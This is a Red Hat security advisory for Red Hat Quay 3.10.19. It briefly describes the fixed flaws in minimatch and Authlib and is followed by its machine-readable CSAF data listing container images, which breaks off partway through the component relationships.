Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).
6.5 (Medium)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker's key, allowing them to bypass authentication and gain unauthorized access.
9.1 (Critical)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a "none" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.
9.1 (Critical)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.
References
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Quay 3.10.19 is now available with bug fixes.",
"title": "Topic"
},
{
"category": "general",
"text": "Quay 3.10.19",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5665",
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25990",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26007",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26996",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27606",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27628",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27904",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27962",
"url": "https://access.redhat.com/security/cve/CVE-2026-27962"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28802",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5665.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Quay 3.10.19",
"tracking": {
"current_release_date": "2026-03-26T15:39:25+00:00",
"generator": {
"date": "2026-03-26T15:39:25+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.4"
}
},
"id": "RHSA-2026:5665",
"initial_release_date": "2026-03-24T18:02:58+00:00",
"revision_history": [
{
"date": "2026-03-24T18:02:58+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-24T18:03:04+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-03-26T15:39:25+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Quay 3.1",
"product": {
"name": "Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:quay:3.10::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Quay"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774022275"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774022278"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Afe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772739218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772726823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3Acaa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772725047"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-bundle@sha256%3Ae165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774022285"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3Ade004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3Ac0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773971077"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3Aba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1772726823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3A733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1772725047"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3A6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773971077"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Aedd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1772726823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3Ad59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1772725047"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3Af6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773971077"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64 as a component of Red Hat Quay 3.1",
